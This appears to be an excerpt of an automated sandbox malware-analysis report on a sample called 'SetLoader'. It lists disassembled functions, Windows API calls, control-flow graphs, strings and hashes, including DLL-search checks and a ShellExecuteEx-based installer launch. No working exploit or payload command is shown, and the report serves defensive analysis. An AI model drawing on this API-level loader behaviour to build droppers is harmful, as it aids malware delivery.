                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                              • String ID:
                                              • API String ID: 42610566-0
                                              • Opcode ID: b5bc1378c6d9f70a6c68085a493732d5c085650136579bb8b0f842051be34415
                                              • Instruction ID: 44368aff0782752754946b4900e9cbbc9a5cb7f0a2b79c62a8a6a98bc963af6e
                                              • Opcode Fuzzy Hash: b5bc1378c6d9f70a6c68085a493732d5c085650136579bb8b0f842051be34415
                                              • Instruction Fuzzy Hash: E24184B2508741AFC724DF24D8809EEF3EABB49750F04091DF599D3240D734A994CB96
                                              Function 0062CEBF Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 962 62cebf-62cee3 call 62d392 965 62cf77-62cf86 call 6310f9 962->965 966 62cee9-62cf28 SetEntriesInAclW 962->966 967 62cf75-62cf76 966->967 968 62cf2a-62cf37 InitializeSecurityDescriptor 966->968 967->965 971 62cf67-62cf6a 968->971 972 62cf39-62cf4a SetSecurityDescriptorDacl 968->972 971->967 974 62cf6c-62cf6f LocalFree 971->974 972->971 973 62cf4c-62cf61 CreateDirectoryW 972->973 973->971 974->967
                                              APIs
                                                • Part of subcall function 0062D392: GetCurrentProcess.KERNEL32(00020008,?), ref: 0062D3A1
                                                • Part of subcall function 0062D392: OpenProcessToken.ADVAPI32(00000000), ref: 0062D3A8
                                                • Part of subcall function 0062D392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0062D3C2
                                                • Part of subcall function 0062D392: GetLastError.KERNEL32 ref: 0062D3CC
                                                • Part of subcall function 0062D392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0062D3F0
                                                • Part of subcall function 0062D392: CopySid.ADVAPI32(00000044,?,00000000), ref: 0062D401
                                              • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 0062CF20
                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0062CF2F
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0062CF42
                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 0062CF61
                                              • LocalFree.KERNEL32(?), ref: 0062CF6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                              • String ID:
                                              • API String ID: 2740647886-0
                                              • Opcode ID: 88294ae9616a684f22e94cf4e9b0ca2f83b90d9dd0f665677e709f99dcfb1267
                                              • Instruction ID: 41cb6f9ca0bbe52ff8a21f7b43b094adf2a46c106037f4d2b332520d734ac98b
                                              • Opcode Fuzzy Hash: 88294ae9616a684f22e94cf4e9b0ca2f83b90d9dd0f665677e709f99dcfb1267
                                              • Instruction Fuzzy Hash: DA21D8B1900209ABDB10DF65E9449EE7BFDFF45314F10812AB815D6210D734DA55CBA1
                                              Function 00612FCB Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 830COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strlen.LIBCMT ref: 006135C3
                                                • Part of subcall function 00623D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,5CB4B331,?,?,5CB4B331,00000001,0061DA04,00000000,5CB4B331,?,00010418,?,?), ref: 00623D2C
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0061370D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                              • String ID: CMT
                                              • API String ID: 1610651222-2756464174
                                              • Opcode ID: abeabbf41ff5d41a4c32585f410c47bc3f4978677b4644ff22a44e69b3df373d
                                              • Instruction ID: 48a1192b6669e89903810dff45212e81ad62c63bffd3bda35bb53a251c22542e
                                              • Opcode Fuzzy Hash: abeabbf41ff5d41a4c32585f410c47bc3f4978677b4644ff22a44e69b3df373d
                                              • Instruction Fuzzy Hash: 6A620371A002A48EDB19DF74C8956EA7BF3AF15300F0C457DEC4B9B382DA759A85CB60
                                              Function 00619906 Relevance: 3.7, Strings: 2, Instructions: 1169COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$AttributesFile_swprintf$CurrentH_prolog3Process__aulldiv_wcsrchr
                                              • String ID: P'a$__tmp_reference_source_
                                              • API String ID: 3636405837-3533469108
                                              • Opcode ID: 419567e2893e2cebbb13e393698b19da18e850e7f56052923780ddbd1c440ad4
                                              • Instruction ID: 199fb34030a121903a012628c3fb2716faa4570d49f005f28e834d83a28388ad
                                              • Opcode Fuzzy Hash: 419567e2893e2cebbb13e393698b19da18e850e7f56052923780ddbd1c440ad4
                                              • Instruction Fuzzy Hash: 1FA21770905285AEDF25DFB4C895BEE7BB7AF05300F0C41B9E9499B282D7305AC5CBA1
                                              Function 0062290A Relevance: 161.3, APIs: 23, Strings: 69, Instructions: 327libraryfileloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 62290a-622941 call 631590 GetModuleHandleW 3 622943-622953 GetProcAddress 0->3 4 622999-622bfa 0->4 5 622955-62296b 3->5 6 62296d-62297d GetProcAddress 3->6 7 622c00-622c0d call 639e7e 4->7 8 622cda 4->8 5->6 6->4 10 62297f-622994 6->10 11 622cdc-622d08 GetModuleFileNameW call 61e208 call 62268b 7->11 16 622c13-622c41 GetModuleFileNameW CreateFileW 7->16 8->11 10->4 24 622d0a-622d16 call 61d076 11->24 19 622c47-622c53 SetFilePointer 16->19 20 622ccc-622cd8 CloseHandle 16->20 19->20 22 622c55-622c71 ReadFile 19->22 20->11 22->20 25 622c73-622c7f 22->25 32 622d45-622d6c call 61e27e GetFileAttributesW 24->32 33 622d18-622d23 call 6228ab 24->33 27 622c85-622ca4 25->27 28 622ede-622ee3 call 6313f9 25->28 30 622cc1-622cca call 6223d6 27->30 30->20 40 622ca6-622cc0 call 6228ab 30->40 42 622d76 32->42 43 622d6e-622d72 32->43 33->32 45 622d25-622d35 33->45 40->30 47 622d78-622d7d 42->47 43->24 46 622d74 43->46 51 622d40-622d43 45->51 46->47 49 622db4-622db6 47->49 50 622d7f 47->50 53 622ec3-622edb call 6310f9 49->53 54 622dbc-622dd3 call 61e252 call 61d076 49->54 52 622d81-622da8 call 61e27e GetFileAttributesW 50->52 51->32 51->43 61 622db2 52->61 62 622daa-622dae 52->62 66 622dd5-622e36 call 6228ab * 2 call 620597 call 614c00 call 620597 call 62c774 54->66 67 622e3b-622e6e call 614c00 AllocConsole 54->67 61->49 62->52 65 622db0 62->65 65->49 73 622ebb-622ebd ExitProcess 66->73 72 622e70-622eb5 GetCurrentProcessId AttachConsole call 636433 GetStdHandle WriteConsoleW Sleep FreeConsole 67->72 67->73 72->73
                                              APIs
                                              • GetModuleHandleW.KERNEL32 ref: 00622937
                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00622949
                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00622973
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00622C1D
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00622C37
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00622C4B
                                              • ReadFile.KERNEL32(00000000,?,00007FFE,$od,00000000), ref: 00622C69
                                              • CloseHandle.KERNEL32(00000000), ref: 00622CCD
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00622CE6
                                              • CompareStringW.KERNEL32(00000400,00001001,pod,?,DXGIDebug.dll,?,$od,?,00000000,?,00000800), ref: 00622D3A
                                              • GetFileAttributesW.KERNELBASE(?,?,$od,00000800,?,00000000,?,00000800), ref: 00622D64
                                              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00622DA0
                                                • Part of subcall function 006228AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006228D4
                                                • Part of subcall function 006228AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00621309,Crypt32.dll,00000000,00621383,00000200,?,00621366,00000000,00000000,?), ref: 006228F4
                                              • _swprintf.LIBCMT ref: 00622E12
                                              • _swprintf.LIBCMT ref: 00622E5E
                                              • AllocConsole.KERNEL32 ref: 00622E66
                                              • GetCurrentProcessId.KERNEL32 ref: 00622E70
                                              • AttachConsole.KERNEL32(00000000), ref: 00622E77
                                              • _wcslen.LIBCMT ref: 00622E8C
                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00622E9D
                                              • WriteConsoleW.KERNEL32(00000000), ref: 00622EA4
                                              • Sleep.KERNEL32(00002710), ref: 00622EAF
                                              • FreeConsole.KERNEL32 ref: 00622EB5
                                              • ExitProcess.KERNEL32 ref: 00622EBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
                                              • String ID: $od$<$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$pod$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                              • API String ID: 270162209-742189887
                                              • Opcode ID: 8f539e737ec7833712d5ff9708706841e22f1bce8966d9b34b656a4159211be7
                                              • Instruction ID: ae74f42a79be0181c182c2180c45353c568913fc8556ccc842f2ae590ec69ba1
                                              • Opcode Fuzzy Hash: 8f539e737ec7833712d5ff9708706841e22f1bce8966d9b34b656a4159211be7
                                              • Instruction Fuzzy Hash: 41D18CB1008795ABD771DF50E858ADFBEEBAB86704F000D1DF5899A251CBB08548CFA7
                                              Function 0062F7FC Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 103windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0062D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
                                                • Part of subcall function 0062D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062D886
                                                • Part of subcall function 0062D864: IsDialogMessageW.USER32(00010418,?), ref: 0062D89A
                                                • Part of subcall function 0062D864: TranslateMessage.USER32(?), ref: 0062D8A8
                                                • Part of subcall function 0062D864: DispatchMessageW.USER32(?), ref: 0062D8B2
                                              • GetDlgItem.USER32(00000068,00673CF0), ref: 0062F81F
                                              • ShowWindow.USER32(00000000,00000005,?,?,0062D099,00000001,?,?,0062DAB9,006482F0,00673CF0,00673CF0,00001000,?,00000000,?), ref: 0062F844
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0062F853
                                              • SendMessageW.USER32(00000000,000000C2,00000000,006465F4), ref: 0062F861
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0062F87B
                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0062F895
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0062F8D9
                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0062F8E4
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0062F8F7
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0062F91E
                                              • SendMessageW.USER32(00000000,000000C2,00000000,0064769C), ref: 0062F92D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                              • String ID: \
                                              • API String ID: 3569833718-2967466578
                                              • Opcode ID: 4a5e3b1ed7d4e8077386c3a71f56dfdd51a505f7b6af730b95a667ff76439be0
                                              • Instruction ID: e24647377fe8872f22c7c3bc14320781dccad4c1c2f885bf72037c899aad0fe0
                                              • Opcode Fuzzy Hash: 4a5e3b1ed7d4e8077386c3a71f56dfdd51a505f7b6af730b95a667ff76439be0
                                              • Instruction Fuzzy Hash: 673124B1208700AFE314DF24EC0AF6B7BEEEB56714F54091DF5A19A1D1C7A449448BA6
                                              Function 0062FAFC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 198windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 685 62fafc-62fb2e call 631590 688 62fb34-62fb40 call 636433 685->688 689 62fd7e-62fd95 call 6310f9 685->689 688->689 694 62fb46-62fb6e call 632640 688->694 697 62fb70 694->697 698 62fb78-62fb89 694->698 697->698 699 62fb94-62fb9d 698->699 700 62fb8b-62fb92 698->700 701 62fb9f-62fba3 699->701 702 62fbfa 699->702 700->701 704 62fba6-62fbac 701->704 703 62fbfe-62fc00 702->703 705 62fc02-62fc05 703->705 706 62fc07-62fc09 703->706 707 62fbae 704->707 708 62fbcd-62fbda 704->708 705->706 711 62fc1c-62fc32 call 61d848 705->711 706->711 712 62fc0b-62fc12 706->712 713 62fbb8-62fbc2 707->713 709 62fd53-62fd55 708->709 710 62fbe0-62fbe4 708->710 715 62fd59-62fd61 709->715 714 62fbea-62fbf4 710->714 710->715 723 62fc34-62fc41 call 624168 711->723 724 62fc4b-62fc56 call 61bccb 711->724 712->711 716 62fc14 712->716 718 62fbb0-62fbb6 713->718 719 62fbc4 713->719 714->704 720 62fbf6 714->720 715->703 716->711 718->713 722 62fbc6-62fbc9 718->722 719->708 720->702 722->708 723->724 729 62fc43 723->729 730 62fc73-62fc80 ShellExecuteExW 724->730 731 62fc58-62fc6f call 61d563 724->731 729->724 730->689 733 62fc86-62fc8c 730->733 731->730 735 62fc8e-62fc95 733->735 736 62fc9f-62fca1 733->736 735->736 737 62fc97-62fc9d 735->737 738 62fca3-62fcac IsWindowVisible 736->738 739 62fcb8-62fccb WaitForInputIdle call 63004d 736->739 737->736 740 62fd0e-62fd1a CloseHandle 737->740 738->739 741 62fcae-62fcb6 ShowWindow 738->741 743 62fcd0-62fcd7 739->743 744 62fd2b-62fd39 740->744 745 62fd1c-62fd29 call 624168 740->745 741->739 743->740 746 62fcd9-62fce1 743->746 748 62fd3b-62fd3d 744->748 749 62fd6d-62fd6f 744->749 745->744 756 62fd66 745->756 746->740 750 62fce3-62fcf4 GetExitCodeProcess 746->750 748->749 753 62fd3f-62fd45 748->753 749->689 751 62fd71-62fd73 749->751 750->740 754 62fcf6-62fd00 750->754 751->689 755 62fd75-62fd78 ShowWindow 751->755 753->749 757 62fd47-62fd51 753->757 758 62fd02 754->758 759 62fd07 754->759 755->689 756->749 757->749 758->759 759->740
                                              APIs
                                              • _wcslen.LIBCMT ref: 0062FB35
                                              • ShellExecuteExW.SHELL32(?), ref: 0062FC78
                                              • IsWindowVisible.USER32(?), ref: 0062FCA4
                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0062FCB0
                                              • WaitForInputIdle.USER32(?,000007D0), ref: 0062FCC1
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0062FCEC
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0062FD12
                                              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0062FD78
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                              • String ID: .exe$.inf$Install
                                              • API String ID: 3646668279-1844831949
                                              • Opcode ID: d0db2312ad25cf43d7b6add6f148b6e5751173a451febffab80a4d760ff8c927
                                              • Instruction ID: 338a7cc988b20c545361a23d550de973025e8dd1b8426865d28d61a950a0b44c
                                              • Opcode Fuzzy Hash: d0db2312ad25cf43d7b6add6f148b6e5751173a451febffab80a4d760ff8c927
                                              • Instruction Fuzzy Hash: A161CE71108BA49AD7219F24F850AEBBBF7AF85704F04483DF8C59B391DBB089858F52
                                              Function 006232F8 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • __aulldiv.LIBCMT ref: 0062331D
                                                • Part of subcall function 0061D076: GetVersionExW.KERNEL32(?), ref: 0061D0A7
                                              • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00623340
                                              • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00623352
                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00623363
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00623373
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00623383
                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 006233BE
                                              • __aullrem.LIBCMT ref: 00623464
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                              • String ID:
                                              • API String ID: 1247370737-0
                                              • Opcode ID: 74c6fb5eacc43c7f0a8ae3e6af1494e9c12c728fa349538227960f4e22a92d7e
                                              • Instruction ID: 4a4b267cce4fbddf1fc3eb53e3606fadd0a5e455187ddd22811606c5d469f7f5
                                              • Opcode Fuzzy Hash: 74c6fb5eacc43c7f0a8ae3e6af1494e9c12c728fa349538227960f4e22a92d7e
                                              • Instruction Fuzzy Hash: D75137B1508355AFC710DF64D88096BBBFAFB89714F00892EF596C7210E738EA48CB52
                                              Function 0063CFAB Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 807 63cfab-63cfc4 808 63cfc6-63cfd6 call 64159c 807->808 809 63cfda-63cfdf 807->809 808->809 816 63cfd8 808->816 810 63cfe1-63cfe9 809->810 811 63cfec-63d010 MultiByteToWideChar 809->811 810->811 813 63d1a3-63d1b6 call 6310f9 811->813 814 63d016-63d022 811->814 817 63d076 814->817 818 63d024-63d035 814->818 816->809 820 63d078-63d07a 817->820 821 63d037-63d046 call 644660 818->821 822 63d054-63d065 call 63bc8e 818->822 824 63d080-63d093 MultiByteToWideChar 820->824 825 63d198 820->825 821->825 834 63d04c-63d052 821->834 822->825 835 63d06b 822->835 824->825 828 63d099-63d0ab call 63d5bc 824->828 829 63d19a-63d1a1 call 63d213 825->829 836 63d0b0-63d0b4 828->836 829->813 838 63d071-63d074 834->838 835->838 836->825 839 63d0ba-63d0c1 836->839 838->820 840 63d0c3-63d0c8 839->840 841 63d0fb-63d107 839->841 840->829 842 63d0ce-63d0d0 840->842 843 63d153 841->843 844 63d109-63d11a 841->844 842->825 845 63d0d6-63d0f0 call 63d5bc 842->845 846 63d155-63d157 843->846 847 63d135-63d146 call 63bc8e 844->847 848 63d11c-63d12b call 644660 844->848 845->829 862 63d0f6 845->862 851 63d191-63d197 call 63d213 846->851 852 63d159-63d172 call 63d5bc 846->852 847->851 861 63d148 847->861 848->851 860 63d12d-63d133 848->860 851->825 852->851 865 63d174-63d17b 852->865 864 63d14e-63d151 860->864 861->864 862->825 864->846 866 63d1b7-63d1bd 865->866 867 63d17d-63d17e 865->867 868 63d17f-63d18f WideCharToMultiByte 866->868 867->868 868->851 869 63d1bf-63d1c6 call 63d213 868->869 869->829
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00637F99,00637F99,?,?,?,0063D1FC,00000001,00000001,62E85006), ref: 0063D005
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0063D1FC,00000001,00000001,62E85006,?,?,?), ref: 0063D08B
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0063D185
                                              • __freea.LIBCMT ref: 0063D192
                                                • Part of subcall function 0063BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              • __freea.LIBCMT ref: 0063D19B
                                              • __freea.LIBCMT ref: 0063D1C0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
